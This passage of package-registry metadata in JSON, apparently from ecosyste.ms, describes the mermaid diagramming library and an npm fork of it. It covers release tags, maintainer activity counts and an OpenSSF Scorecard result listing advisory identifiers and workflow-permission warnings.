tml_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:51.372Z","dependent_packages_count":0,"downloads":219,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":36.218400217480195,"dependent_packages_count":51.94233964833016,"stargazers_count":0.07924746628473674,"forks_count":0.4644524724339246,"docker_downloads_count":null,"average":22.176109951132254},"purl":"pkg:npm/%40ted-marozzi/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@ted-marozzi/mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@ted-marozzi/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@ted-marozzi/mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ted-marozzi%2Fmermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ted-marozzi%2Fmermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ted-marozzi%2Fmermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@ted-marozzi%2Fmermaid/related_packages","maintainers":[{"uuid":"ted-marozzi","login":"ted-marozzi","name":null,"email":"marozzi.t@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~ted-marozzi","role":null,"created_at":"2023-12-06T12:46:10.122Z","updated_at":"2023-12-06T12:46:10.122Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ted-marozzi/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":4995235,"name":"org.webjars.bower:mermaid","ecosystem":"maven","description":"WebJar for mermaid","homepage":"https://www.webjars.org","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":[],"namespace":"org.webjars.bower","versions_count":4,"first_release_published_at":"2016-09-10T19:51:31.000Z","latest_release_published_at":"2023-06-29T13:23:48.000Z","latest_release_number":"10.2.3","last_synced_at":"2025-09-01T12:55:58.069Z","created_at":"2022-07-27T10:46:27.643Z","updated_at":"2025-09-01T14:17:51.385Z","registry_url":"https://central.sonatype.com/artifact/org.webjars.bower/mermaid/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.webjars.bower/mermaid/","metadata":{},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10